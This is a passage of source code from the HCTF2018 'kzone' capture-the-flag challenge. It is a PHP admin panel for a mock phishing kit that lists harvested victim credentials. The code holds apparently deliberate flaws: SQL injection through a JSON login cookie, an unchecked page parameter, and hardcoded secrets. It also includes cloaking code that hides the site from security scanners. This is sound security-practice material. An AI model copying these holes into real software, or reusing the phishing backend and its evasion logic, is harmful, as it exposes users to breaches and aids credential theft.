75 |                         echo 'Non-thread safe';
76 |                     } ?>
77 |                 </li>
78 |                 <li class="list-group-item">
79 |                     <b>MySQL Version：</b><?php echo `mysql -V` ?>
80 |                 </li>
81 |                 <li class="list-group-item">
82 |                     <b>Server Software：</b><?php echo $_SERVER['SERVER_SOFTWARE'] ?>
83 |                 </li>
84 |             </ul>
85 |         </div>
86 |     </div>
87 | </div>
88 | 


--------------------------------------------------------------------------------
/HCTF2018_kzone/web/admin/list.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | include("../include/common.php");
  3 | if ($islogin == 1) {
  4 | } else exit("<script language='javascript'>window.location.href='./login.php';</script>");
  5 | ?>
  6 | <!DOCTYPE html>
  7 | <html lang="zh-cn">
  8 | <head>
  9 |     <meta charset="utf-8"/>
 10 |     <meta name="viewport" content="width=device-width, initial-scale=1"/>
 11 |     <title>KK Zone Fish Control Center</title>
 12 |     <link href="//cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet"/>
 13 |     <script src="//cdn.bootcss.com/jquery/1.12.4/jquery.min.js"></script>
 14 |     <script src="//cdn.bootcss.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
 15 |     <!--[if lt IE 9]>
 16 |     <script src="//cdn.bootcss.com/html5shiv/3.7.3/html5shiv.min.js"></script>
 17 |     <script src="//cdn.bootcss.com/respond.js/1.4.2/respond.min.js"></script>
 18 |     <![endif]-->
 19 | </head>
 20 | <body>
 21 | <?php
 22 | $pagesize = 15;
 23 | if (!isset($_GET['page'])) {
 24 |     $page = 1;
 25 |     $pageu = $page - 1;
 26 | } else {
 27 |     $page = $_GET['page'];
 28 |     $pageu = ($page - 1) * $pagesize;
 29 | } ?>
 30 | <nav class="navbar navbar-fixed-top navbar-default">
 31 |     <div class="container">
 32 |         <div class="navbar-header">
 33 |             <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar"
 34 |                     aria-expanded="false" aria-controls="navbar">
 35 |                 <span class="sr-only">Navigation</span>
 36 |                 <span class="icon-bar"></span>
 37 |                 <span class="icon-bar"></span>
 38 |                 <span class="icon-bar"></span>
 39 |             </button>
 40 |             <a class="navbar-brand" href="./">KK Zone Fish Control Center</a>
 41 |         </div><!-- /.navbar-header -->
 42 |         <div id="navbar" class="collapse navbar-collapse">
 43 |             <ul class="nav navbar-nav navbar-right">
 44 |                 <li class="">
 45 |                     <a href="./"><span class="glyphicon glyphicon-user"></span> Index</a>
 46 |                 </li>
 47 |                 <li class="active">
 48 |                     <a href="./list.php"><span class="glyphicon glyphicon-calendar"></span> Fish Management</a>
 49 |                 </li>
 50 |                 <li><a href="./login.php?logout"><span class="glyphicon glyphicon-log-out"></span> Logout</a></li>
 51 |             </ul>
 52 |         </div><!-- /.navbar-collapse -->
 53 |     </div><!-- /.container -->
 54 | </nav><!-- /.navbar -->
 55 | <div class="container" style="padding-top:70px;">
 56 |     <div class="col-md-12 center-block" style="float: none;">
 57 |         <div class="table-responsive">
 58 |             <table class="table table-striped">
 59 |                 <thead>
 60 |                 <tr>
 61 |                     <th>Fish Account</th>
 62 |                     <th>Fish Password</th>
 63 |                     <th>Login IP</th>
 64 |                     <th>Login Address</th>
 65 |                     <th>Login Time</th>
 66 |                     <th>Login Device</th>
 67 |                 </tr>
 68 |                 </thead>
 69 |                 <tbody>
 70 |                 <tbody>
 71 |                 <?php
 72 |                 $sum = $DB->count("SELECT count(*) from fish_user_fake");
 73 |                 $output = $DB->count("SELECT count(*) from fish_user_fake where output=1");
 74 |                 $rs = $DB->query("SELECT * FROM fish_user_fake order by id desc limit $pageu,$pagesize");
 75 |                 while ($res = $DB->fetch($rs)) {
 76 |                     if ($res['output'] == 0) {
 77 |                         $res['output'] = 'Yes';
 78 |                     } else {
 79 |                         $res['output'] = 'No';
 80 |                     }
 81 |                     echo '<tr><td>' . $res['username'] . '</td><td>' . $res['password'] . '</td><td>' . $res['ip'] . '</td><td>' . $res['address'] . '</td><td>' . $res['time'] . '</td><td>' . $res['device'] . '</td></tr>';
 82 |                 }
 83 |                 ?>
 84 |                 </tbody>
 85 |             </table>
 86 |         </div>
 87 |         <?php
 88 |         echo '<ul class="pagination">';
 89 |         $s = ceil($gls / $pagesize);
 90 |         $first = 1;
 91 |         $prev = $page - 1;
 92 |         $next = $page + 1;
 93 |         $last = $s;
 94 |         if ($page > 1) {
 95 |             echo '<li><a href="list.php?page=' . $first . $link . '">First Page</a></li>';
 96 |             echo '<li><a href="list.php?page=' . $prev . $link . '">&laquo;</a></li>';
 97 |         } else {
 98 |             echo '<li class="disabled"><a>First Page</a></li>';
 99 |             echo '<li class="disabled"><a>&laquo;</a></li>';
100 |         }
101 |         for ($i = 1; $i < $page; $i++)
102 |             echo '<li><a href="list.php?page=' . $i . $link . '">' . $i . '</a></li>';
103 |         echo '<li class="disabled"><a>' . $page . '</a></li>';
104 |         for ($i = $page + 1; $i <= $s; $i++)
105 |             echo '<li><a href="list.php?page=' . $i . $link . '">' . $i . '</a></li>';
106 |         echo '';
107 |         if ($page < $s) {
108 |             echo '<li><a href="list.php?page=' . $next . $link . '">&raquo;</a></li>';
109 |             echo '<li><a href="list.php?page=' . $last . $link . '">Last Page</a></li>';
110 |         } else {
111 |             echo '<li class="disabled"><a>&raquo;</a></li>';
112 |             echo '<li class="disabled"><a>Last Page</a></li>';
113 |         }
114 |         echo '</ul>';
115 |         ?>
116 |     </div>
117 | </div>
118 | 


--------------------------------------------------------------------------------
/HCTF2018_kzone/web/admin/login.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | include ("../include/common.php");
  3 | if (isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['login'])) {
  4 |     $user = addslashes($_POST['user']);
  5 |     $pass = addslashes($_POST['pass']);
  6 |     $safepassword = $_POST['safepassword'];
  7 |     $row = $DB->get_row("SELECT * FROM fish_admin WHERE username='$user' limit 1");
  8 |     if ($row['username'] == '') {
  9 |         exit("<script language='javascript'>alert('The administrator account or password is incorrect!');history.go(-1);</script>");
 10 |     } elseif (md5($pass) != $row['password']) {
 11 |         exit("<script language='javascript'>alert('The administrator account or password is incorrect!');history.go(-1);</script>");
 12 |     } elseif ($row['username'] == $user && $row['password'] == md5($pass)) {
 13 |         if (isset($_POST['ispersis'])) {
 14 |             $login_data['admin_user']=$user;
 15 |             $login_data['admin_pass']=sha1(md5($pass) . LOGIN_KEY);
 16 |             setcookie("islogin", "1",time() + 604800 );
 17 |             setcookie("login_data",json_encode($login_data),time() + 604800,null,null,true);
 18 |             $realip = real_ip();
 19 |             $address = getCity($realip);
 20 |             $ua = $_SERVER['HTTP_USER_AGENT'];
 21 |             $device = get_device($ua);
 22 |             $time = date("Y-m-d H:i:s");
 23 |             $sql = "INSERT INTO `fish_ip` (`admin`, `ip`, `addres`, `platform`, `date`) VALUES ('{$row['id']}','{$realip}','{$address}','{$device}','{$time}');";
 24 |             $DB->query($sql);
 25 |             unset($login_data);
 26 |             exit("<script language='javascript'>alert('login successful!');window.location.href='./';</script>");
 27 |         } else {
 28 |             $_SESSION['islogin'] = 1;
 29 |             $_SESSION['admin_user'] = base64_encode($user);
 30 |             $_SESSION['admin_pass'] = sha1(md5($pass) . LOGIN_KEY);
 31 |             $realip = real_ip();
 32 |             $address = getCity($realip);
 33 |             $ua = $_SERVER['HTTP_USER_AGENT'];
 34 |             $device = get_device($ua);
 35 |             $time = date("Y-m-d H:i:s");
 36 |             $sql = "INSERT INTO `fish_ip` (`admin`, `ip`, `addres`, `platform`, `date`) VALUES ('{$row['id']}','{$realip}','{$address}','{$device}','{$time}');";
 37 |             $DB->query($sql);
 38 |             exit("<script language='javascript'>alert('Login Successful!');window.location.href='./';</script>");
 39 |         }
 40 |     }
 41 | } elseif (isset($_GET['logout'])) {
 42 |     setcookie("islogin", "");
 43 |     setcookie("login_data", "");
 44 |     unset($_SESSION['islogin']);
 45 |     unset($_SESSION['admin_user']);
 46 |     unset($_SESSION['admin_pass']);
 47 |     exit("<script language='javascript'>alert('You have successfully logged out of this login!');window.location.href='./login.php';</script>");
 48 | } elseif ($islogin == 1) {
 49 |     exit("<script language='javascript'>alert('You are already logged in!');window.location.href='./';</script>");
 50 | } ?>
 51 | <!DOCTYPE html>
 52 | <html lang="zh-cn">
 53 | <head>
 54 |   <meta charset="utf-8"/>
 55 |   <meta name="viewport" content="width=device-width, initial-scale=1"/>
 56 |   <title>Manager Login</title>
 57 |   <meta name="keywords" content=""/>
 58 |   <meta name="description" content=""/>
 59 |   <link href="//cdn.bootcss.com/bootstrap/3.3.5/css/bootstrap.min.css" rel="stylesheet"/>
 60 |   <script src="//cdn.bootcss.com/jquery/1.11.3/jquery.min.js"></script>
 61 |   <script src="//cdn.bootcss.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
 62 |     <!--[if lt IE 9]>
 63 |       <script src="http://cdn.bootcss.com/html5shiv/3.7.2/html5shiv.min.js"></script>
 64 |       <script src="http://cdn.bootcss.com/respond.js/1.4.2/respond.min.js"></script>
 65 |     <![endif]-->
 66 | </head>
 67 |   <nav class="navbar navbar-fixed-top navbar-default">
 68 |     <div class="container">
 69 |         <div class="navbar-header">
 70 |             <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar"
 71 |                     aria-expanded="false" aria-controls="navbar">
 72 |                 <span class="sr-only">Navigation</span>
 73 |                 <span class="icon-bar"></span>
 74 |                 <span class="icon-bar"></span>
 75 |                 <span class="icon-bar"></span>
 76 |             </button>
 77 |             <a class="navbar-brand" href="./">KK Zone Fish Control Center</a>
 78 |         </div><!-- /.navbar-header -->
 79 |         <div id="navbar" class="collapse navbar-collapse">
 80 |             <ul class="nav navbar-nav navbar-right">
 81 |                 <li class="">
 82 |                     <a href="./"><span class="glyphicon glyphicon-user"></span> Index</a>
 83 |                 </li>
 84 |                 <li class="active">
 85 |                     <a href="./list.php"><span class="glyphicon glyphicon-calendar"></span> Fish Management</a>
 86 |                 </li>
 87 |                 <li><a href="./login.php?logout"><span class="glyphicon glyphicon-log-out"></span> Logout</a></li>
 88 |             </ul>
 89 |         </div><!-- /.navbar-collapse -->
 90 |     </div><!-- /.container -->
 91 | </nav><!-- /.navbar -->
 92 |   <div class="container" style="padding-top:70px;">
 93 |     <div class="col-xs-12 col-sm-10 col-lg-8 center-block" style="float: none;">
 94 |       <div class="panel panel-primary">
 95 |         <div class="panel-heading"><h3 class="panel-title">Manager Login</h3></div>
 96 |         <div class="panel-body">
 97 |           <form class="form-horizontal" action="login.php" method="post">
 98 |             <div class="input-group">
 99 |               <span class="input-group-addon"><span class="glyphicon glyphicon-user"></span></span>
100 |               <input type="text" name="user" value="" class="form-control" placeholder="Manager's Account" required="required"/>
101 |             </div><br/>
102 |             <div class="input-group">
103 |               <span class="input-group-addon"><span class="glyphicon glyphicon-lock"></span></span>
104 |               <input type="password" name="pass" class="form-control" placeholder="Manager's Password" required="required"/>
105 |             </div><br/>
106 |             <div class="form-group">
107 |               <div class="col-xs-12"><input id="submit" type="submit" name="login"  value="Login" class="btn btn-primary form-control"/></div>
108 |             </div>
109 |           </form>
110 |         </div>
111 |       </div>
112 |     </div>
113 |   </div>


--------------------------------------------------------------------------------
/HCTF2018_kzone/web/admin/pass.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | include("../include/common.php");
 3 | if ($islogin == 1) {
 4 | } else exit("<script language='javascript'>window.location.href='./login.php';</script>");
 5 | if (isset($_POST['data'])) {
 6 |     $name = addslashes($_POST['name']);
 7 |     $qq = addslashes($_POST['qq']);
 8 |     $sql = "update fish_admin set name='$name',qq='$qq' where id='{$udata['id']}';";
 9 |     $DB->query($sql);
10 |     exit("<script language='javascript'>alert('The data was modified successfully!');window.location.href='./modify.php';</script>");
11 | } else if (isset($_POST['passwd'])) {
12 |     $oldpass = addslashes($_POST['oldpass']);
13 |     if ($udata['password'] == md5($oldpass)) {
14 |         $newpass = addslashes($_POST['newpass']);
15 |         $checkpass = addslashes($_POST['checkpass']);
16 |         if ($newpass == $checkpass) {
17 |             if ($newpass == '') {
18 |                 exit("<script language='javascript'>alert('The new password is not allowed to be empty!');history.go(-1);</script>");
19 |             }
20 |             $newpass = md5($newpass);
21 |             $sql = "update fish_admin set password='$newpass' where id='{$udata['id']}';";
22 |             $DB->query($sql);
23 |             setcookie("islogin", "", time() - 604800);
24 |             setcookie("login_data", "", time() - 604800);
25 |             unset($_SESSION['islogin']);
26 |             unset($_SESSION['admin_user']);
27 |             unset($_SESSION['admin_pass']);
28 |             exit("<script language='javascript'>alert('Your password has been modified successfully. Please re-login with your new password.！');window.location.href='./login.php';</script>");
29 |         } else {
30 |             exit("<script language='javascript'>alert('The password input is inconsistent twice, and the verification of the new password fails!');history.go(-1);</script>");
31 |         }
32 |     } else {
33 |         exit("<script language='javascript'>alert('The old password is incorrect!');history.go(-1);</script>");
34 |     }
35 | }
36 | ?>
37 | <!DOCTYPE html>
38 | <html lang="zh-cn">
39 | <head>
40 |     <meta charset="utf-8"/>
41 |     <meta name="viewport" content="width=device-width, initial-scale=1"/>
42 |     <title>Change Password</title>
43 | 
44 | </head>
45 | <body>
46 | <table width="100%" border="0" cellspacing="1" cellpadding="2" align="center" bgcolor="0071bc">
47 |     <tr bgcolor="#EEEEEE" align="center">
48 |         <td height="21"><a href="index.php">Data view</a></td>
49 |         <td bgcolor="#EEEEEE"><a href="pass.php">Change Password</a></td>
50 |         <td height="21"><a href="login.php?logout">Logout</a></td>
51 |     </tr>
52 | </table>
53 | <form class="js-validation-bootstrap" action="pass.php" method="post" novalidate="novalidate">
54 | 
55 |     <div class="input-group">
56 |         <span class="input-group-addon"><span class="glyphicon glyphicon-lock"></span></span>
57 |         </br>
58 |         <input type="text" name="oldpass" id="password" class="form-control"
59 |                placeholder="Input your old password please" required="required"/>
60 |     </div>
61 |     <br/>
62 |     <div class="input-group">
63 |         <span class="input-group-addon"><span class="glyphicon glyphicon-lock"></span></span>
64 |         <input type="text" name="newpass" id="password" class="form-control"
65 |                placeholder="Input your new password please" required="required"/>
66 |     </div>
67 |     <br/>
68 |     <div class="input-group">
69 |         <span class="input-group-addon"><span class="glyphicon glyphicon-lock"></span></span>
70 |         <input type="text" name="checkpass" id="password" class="form-control"
71 |                placeholder="Confirm your new password please"
72 |                required="required"/>
73 |     </div>
74 |     <br/>
75 |     <div class="form-group">
76 |         <div class="col-xs-14"><input name="passwd" type="submit" value="Submit" class="btn btn-primary form-control"/>
77 |         </div>
78 | 
79 | 
80 | </body>
81 | </html>


--------------------------------------------------------------------------------
/HCTF2018_kzone/web/config.php:
--------------------------------------------------------------------------------
1 | <?php
2 | $host = "localhost";
3 | $port = "3306";
4 | $user = "r00t";
5 | $pwd = "Fish_k0u_z0ne";
6 | $dbname = "hctf_kouzone";
7 | ?>


--------------------------------------------------------------------------------
/HCTF2018_kzone/web/include/common.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 |     
 3 | error_reporting(0);
 4 | header('Content-Type: text/html; charset=UTF-8');
 5 | define('IN_CRONLITE', true);
 6 | define('ROOT', dirname(__FILE__).'/');
 7 | define('LOGIN_KEY', 'abchdbb768526');
 8 | date_default_timezone_set("PRC");
 9 | $date = date("Y-m-d H:i:s");
10 | session_start();
11 | 
12 | include ROOT.'../config.php';
13 | 
14 | if(!isset($port))$port='3306';
15 | include_once(ROOT."db.class.php");
16 | $DB=new DB($host,$user,$pwd,$dbname,$port);
17 | 
18 | $password_hash='!@#%!s!';
19 | require_once "safe.php";
20 | require_once ROOT."function.php";
21 | require_once ROOT."member.php";
22 | require_once ROOT."os.php";
23 | require_once ROOT."kill.intercept.php";
24 | ?>


--------------------------------------------------------------------------------
/HCTF2018_kzone/web/include/db.class.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | if(!defined('IN_CRONLITE'))exit();
  3 | 
  4 | $nomysqli=false;
  5 | 
  6 | if(defined('SQLITE')==true){
  7 | 	class DB {
  8 | 		var $link = null;
  9 | 
 10 | 		function __construct($db_file){
 11 | 			global $siteurl;
 12 | 		$this->link = new PDO('sqlite:'.ROOT.'includes/sqlite/'.$db_file.'.db');
 13 | 		if (!$this->link) die('Connection Sqlite failed.\n');
 14 | 		return true;
 15 |         }
 16 | 
 17 | 		function fetch($q){
 18 | 			return $q->fetch();
 19 | 		}
 20 | 		function get_row($q){
 21 | 			$sth = $this->link->query($q);
 22 | 			return $sth->fetch();
 23 | 		}
 24 | 		function count($q){
 25 | 			$sth = $this->link->query($q);
 26 | 			return $sth->fetchColumn();
 27 | 		}
 28 | 		function query($q){
 29 | 			return $this->result=$this->link->query($q);
 30 | 		}
 31 | 		function affected(){
 32 | 			return $this->result->rowCount();
 33 | 		}
 34 | 		function error(){
 35 | 			$error = $this->link->errorInfo();
 36 | 			return '['.$error[1].'] '.$error[2];
 37 | 		}
 38 | 	}
 39 | }
 40 | elseif(extension_loaded('mysqli') && $nomysqli==false) {
 41 |     class DB {
 42 |         var $link = null;
 43 | 
 44 |         function __construct($db_host,$db_user,$db_pass,$db_name,$db_port){
 45 |             
 46 |             $this->link = mysqli_connect($db_host, $db_user, $db_pass, $db_name, $db_port);
 47 |             
 48 |             if (!$this->link) die('Connect Error (' . mysqli_connect_errno() . ') '.mysqli_connect_error());
 49 |             
 50 |             //mysqli_select_db($this->link, $db_name) or die(mysqli_error($this->link));
 51 |             
 52 |  
 53 | mysqli_query($this->link,"set sql_mode = ''");
 54 | mysqli_query($this->link,"set character set 'utf8'");
 55 | mysqli_query($this->link,"set names 'utf8'");
 56 |  
 57 | 	return true;
 58 | 	}
 59 | 		function fetch($q){
 60 | 			return mysqli_fetch_assoc($q);
 61 | 		}
 62 | 		function get_row($q){
 63 | 			$result = mysqli_query($this->link,$q);
 64 | 			return mysqli_fetch_assoc($result);
 65 | 		}
 66 | 		function count($q){
 67 | 			$result = mysqli_query($this->link,$q);
 68 | 			$count = mysqli_fetch_array($result);
 69 | 			return $count[0];
 70 | 		}
 71 | 		function query($q){
 72 | 			return mysqli_query($this->link,$q);
 73 | 		}
 74 | 		function escape($str){
 75 | 			return mysqli_real_escape_string($this->link,$str);
 76 | 		}
 77 | 		function insert($q){
 78 | 			if(mysqli_query($this->link,$q))
 79 | 				return mysqli_insert_id($this->link); 
 80 | 			return false;
 81 | 		}
 82 | 		function affected(){
 83 | 			return mysqli_affected_rows($this->link);
 84 | 		}
 85 | 		function insert_array($table,$array){
 86 | 			$q = "INSERT INTO `$table`";
 87 | 			$q .=" (`".implode("`,`",array_keys($array))."`) ";
 88 | 			$q .=" VALUES ('".implode("','",array_values($array))."') ";
 89 | 			
 90 | 			if(mysqli_query($this->link,$q))
 91 | 				return mysqli_insert_id($this->link);
 92 | 			return false;
 93 | 		}
 94 | 		function error(){
 95 | 			$error = mysqli_error($this->link);
 96 | 			$errno = mysqli_errno($this->link);
 97 | 			return '['.$errno.'] '.$error;
 98 | 		}
 99 | 		function close(){
100 | 			$q = mysqli_close($this->link);
101 | 			return $q;
102 | 		}
103 | 	}
104 | } else { // we use the old mysql
105 | 	class DB {
106 | 		var $link = null;
107 | 
108 | 		function __construct($db_host,$db_user,$db_pass,$db_name,$db_port){
109 | 
110 | 		$this->link = @mysql_connect($db_host.':'.$db_port, $db_user, $db_pass);
111 |             
112 | 		if (!$this->link) die('Connect Error (' . mysql_errno() . ') '.mysql_error());
113 |             
114 | 			mysql_select_db($db_name, $this->link) or die(mysql_error($this->link));
115 | 
116 | mysql_query("set sql_mode = ''");
117 | mysql_query("set character set 'utf8'");
118 | mysql_query("set names 'utf8'");
119 |  
120 | 
121 | 	return true;
122 | 		}
123 | 		function fetch($q){
124 | 			return mysql_fetch_assoc($q);
125 | 		}
126 | 		function get_row($q){
127 | 			$result = mysql_query($q, $this->link);
128 | 			return mysql_fetch_assoc($result);
129 | 		}
130 | 		function count($q){
131 | 			$result = mysql_query($q, $this->link);
132 | 			$count = mysql_fetch_array($result);
133 | 			return $count[0];
134 | 		}
135 |         function query($q){
136 | 			return mysql_query($q, $this->link);
137 | 		}
138 | 		function escape($str){
139 | 			return mysql_real_escape_string($str, $this->link);
140 | 		}
141 | 		function affected(){
142 | 			return mysql_affected_rows($this->link);
143 | 		}
144 | 		function insert($q){
145 | 			if(mysql_query($q, $this->link))
146 | 				return mysql_insert_id($this->link);
147 | 			return false;
148 | 		}
149 | 		function insert_array($table,$array){
150 | 			$q = "INSERT INTO `$table`";
151 | 			$q .=" (`".implode("`,`",array_keys($array))."`) ";
152 | 			$q .=" VALUES ('".implode("','",array_values($array))."') ";
153 | 
154 | 			if(mysql_query($q, $this->link))
155 | 				return mysql_insert_id($this->link);
156 | 			return false;
157 | 		}
158 | 		function error(){
159 | 			$error = mysql_error($this->link);
160 | 			$errno = mysql_errno($this->link);
161 | 			return '['.$errno.'] '.$error;
162 | 		}
163 | 		function close(){
164 | 			$q = mysql_close($this->link);
165 | 			return $q;
166 | 		}
167 | 	}
168 | 
169 | }
170 | ?>


--------------------------------------------------------------------------------
/HCTF2018_kzone/web/include/function.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | function curl_get($url)
  3 | {
  4 | $ch=curl_init($url);
  5 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  6 | curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  7 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  8 | curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Linux; U; Android 4.4.1; zh-cn; R815T Build/JOP40D) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/4.5 Mobile Safari/533.1');
  9 | curl_setopt($ch, CURLOPT_TIMEOUT, 30);
 10 | $content=curl_exec($ch);
 11 | curl_close($ch);
 12 | return($content);
 13 | }
 14 | 
 15 | function getIp() {
 16 | 	$ip = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '';
 17 | 	if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
 18 | 		$list = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
 19 | 		$ip = $list[0];
 20 | 	}
 21 | 	if (!ip2long($ip)) {
 22 | 		$ip = '';
 23 | 	}
 24 | 	return $ip;
 25 | }
 26 | function getCity($ip = '')
 27 | {
 28 |     if($ip == ''){
 29 |         $url = "http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=json";
 30 |         $ip=json_decode(file_get_contents($url),true);
 31 |         $data = $ip;
 32 |     }else{
 33 |         $url="http://ip.taobao.com/service/getIpInfo.php?ip=".$ip;
 34 |         $ip=json_decode(file_get_contents($url));   
 35 |         if((string)$ip->code=='1'){
 36 |            return false;
 37 |         }
 38 |         $data = (array)$ip->data;
 39 |     }
 40 |     
 41 |     $province = $data['region'];
 42 |     $city = $data['city'];
 43 |     $city1=$province.$city; 
 44 |     return $city1;
 45 | }
 46 | 
 47 | function strexists($string, $find) {
 48 | 	return !(strpos($string, $find) === FALSE);
 49 | }
 50 | function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
 51 | 	$ckey_length = 4;
 52 | 	$key = md5($key ? $key : ENCRYPT_KEY);
 53 | 	$keya = md5(substr($key, 0, 16));
 54 | 	$keyb = md5(substr($key, 16, 16));
 55 | 	$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
 56 | 	$cryptkey = $keya.md5($keya.$keyc);
 57 | 	$key_length = strlen($cryptkey);
 58 | 	$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
 59 | 	$string_length = strlen($string);
 60 | 	$result = '';
 61 | 	$box = range(0, 255);
 62 | 	$rndkey = array();
 63 | 	for($i = 0; $i <= 255; $i++) {
 64 | 		$rndkey[$i] = ord($cryptkey[$i % $key_length]);
 65 | 	}
 66 | 	for($j = $i = 0; $i < 256; $i++) {
 67 | 		$j = ($j + $box[$i] + $rndkey[$i]) % 256;
 68 | 		$tmp = $box[$i];
 69 | 		$box[$i] = $box[$j];
 70 | 		$box[$j] = $tmp;
 71 | 	}
 72 | 	for($a = $j = $i = 0; $i < $string_length; $i++) {
 73 | 		$a = ($a + 1) % 256;
 74 | 		$j = ($j + $box[$a]) % 256;
 75 | 		$tmp = $box[$a];
 76 | 		$box[$a] = $box[$j];
 77 | 		$box[$j] = $tmp;
 78 | 		$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
 79 | 	}
 80 | 	if($operation == 'DECODE') {
 81 | 		if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
 82 | 			return substr($result, 26);
 83 | 		} else {
 84 | 			return '';
 85 | 		}
 86 | 	} else {
 87 | 		return $keyc.str_replace('=', '', base64_encode($result));
 88 | 	}
 89 | }
 90 | 
 91 | function random($length, $numeric = 0) {
 92 | 	$seed = base_convert(md5(microtime().$_SERVER['DOCUMENT_ROOT']), 16, $numeric ? 10 : 35);
 93 | 	$seed = $numeric ? (str_replace('0', '', $seed).'012340567890') : ($seed.'zZ'.strtoupper($seed));
 94 | 	$hash = '';
 95 | 	$max = strlen($seed) - 1;
 96 | 	for($i = 0; $i < $length; $i++) {
 97 | 		$hash .= $seed{mt_rand(0, $max)};
 98 | 	}
 99 | 	return $hash;
100 | }
101 | ?>


--------------------------------------------------------------------------------
/HCTF2018_kzone/web/include/kill.intercept.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | function real_ip()
 3 | {
 4 |     $ip = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '';
 5 |     if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
 6 |         $list = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
 7 |         $ip = $list[0];
 8 |     }
 9 |     if (!ip2long($ip)) {
10 |         $ip = '';
11 |     }
12 |     return $ip;
13 | }
14 | 
15 | $iptables = '977012992~977013247|977084416~977084927|1743654912~1743655935|1949957632~1949958143|2006126336~2006127359|2111446272~2111446527|3418570752~3418578943|3419242496~3419250687|3419250688~3419275263|3682941952~3682942207|3682942464~3682942719|3682986660~3682986663|1707474944~1707606015|1709318400~1709318655|236000768~236001023|1884967642|1884967620|1893733510|1709332858|1709325774|1709342057|1709341968|1709330358|1709335492|1709327575|1709327041|1709327557|1709327573|1975065457|1902908741|1902908705|3029946827|2077187986|2345090787|236000818';
16 | $remoteiplong = bindec(decbin(ip2long(real_ip())));
17 | foreach (explode('|', $iptables) as $iprows) {
18 |     if ($remoteiplong == $iprows) exit('welcome！');
19 |     $ipbanrange = explode('~', $iprows);
20 |     if ($remoteiplong >= $ipbanrange[0] && $remoteiplong <= $ipbanrange[1])
21 |         exit('welcome！');
22 | }
23 | if (!isset($_SERVER['HTTP_ACCEPT']) || preg_match("/manager/", strtolower($_SERVER['HTTP_USER_AGENT'])) || isset($_SERVER['HTTP_REFERER']) && $_SERVER['HTTP_REFERER'] == '' || strpos($_SERVER['HTTP_USER_AGENT'], 'Mozilla') === false && strpos($_SERVER['HTTP_USER_AGENT'], 'ozilla') !== false || preg_match("/Windows NT 6.1/", $_SERVER['HTTP_USER_AGENT']) && $_SERVER['HTTP_ACCEPT'] == '*/*' || preg_match("/Windows NT 5.1/", $_SERVER['HTTP_USER_AGENT']) && $_SERVER['HTTP_ACCEPT'] == '*/*' || preg_match("/vnd.wap.wml/", $_SERVER['HTTP_ACCEPT']) && preg_match("/Windows NT 5.1/", $_SERVER['HTTP_USER_AGENT']) || isset($_SERVER['HTTP_REFERER']) && strpos($_SERVER['HTTP_REFERER'], 'urls.tr.com') !== false || isset($_COOKIE['ASPSESSIONIDQASBQDRC']) || empty($_SERVER['HTTP_USER_AGENT']) || preg_match("/Alibaba.Security.Heimdall/", $_SERVER['HTTP_USER_AGENT'])) {
24 |     exit('welcome！');
25 | }
26 | if (strpos($_SERVER['HTTP_USER_AGENT'], 'Coolpad Y82-520') !== false && $_SERVER['HTTP_ACCEPT'] == '*/*' || strpos($_SERVER['HTTP_USER_AGENT'], 'Mac OS X 10_12_4') !== false && $_SERVER['HTTP_ACCEPT'] == '*/*' || strpos($_SERVER['HTTP_USER_AGENT'], 'iPhone OS') !== false && strpos($_SERVER['HTTP_USER_AGENT'], 'Baiduspider/') === false && $_SERVER['HTTP_ACCEPT'] == '*/*' || strpos($_SERVER['HTTP_USER_AGENT'], 'Android') !== false && strpos($_SERVER['HTTP_USER_AGENT'], 'Baiduspider/') === false && $_SERVER['HTTP_ACCEPT'] == '*/*' || strpos($_SERVER['HTTP_ACCEPT_LANGUAGE'], 'en') !== false && strpos($_SERVER['HTTP_ACCEPT_LANGUAGE'], 'zh') === false || strpos($_SERVER['HTTP_USER_AGENT'], 'iPhone') !== false && strpos($_SERVER['HTTP_USER_AGENT'], 'en-') !== false && strpos($_SERVER['HTTP_USER_AGENT'], 'zh') === false) {
27 |     exit('Your current browser does not support or the operating system language setting is not Chinese, you cannot access this site!');
28 | }


--------------------------------------------------------------------------------
/HCTF2018_kzone/web/include/member.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | if (!defined('IN_CRONLITE')) exit();
 3 | $islogin = 0;
 4 | if (isset($_COOKIE["islogin"])) {
 5 |     if ($_COOKIE["login_data"]) {
 6 |         $login_data = json_decode($_COOKIE['login_data'], true);
 7 |         $admin_user = $login_data['admin_user'];
 8 |         $udata = $DB->get_row("SELECT * FROM fish_admin WHERE username='$admin_user' limit 1");
 9 |         if ($udata['username'] == '') {
10 |             setcookie("islogin", "", time() - 604800);
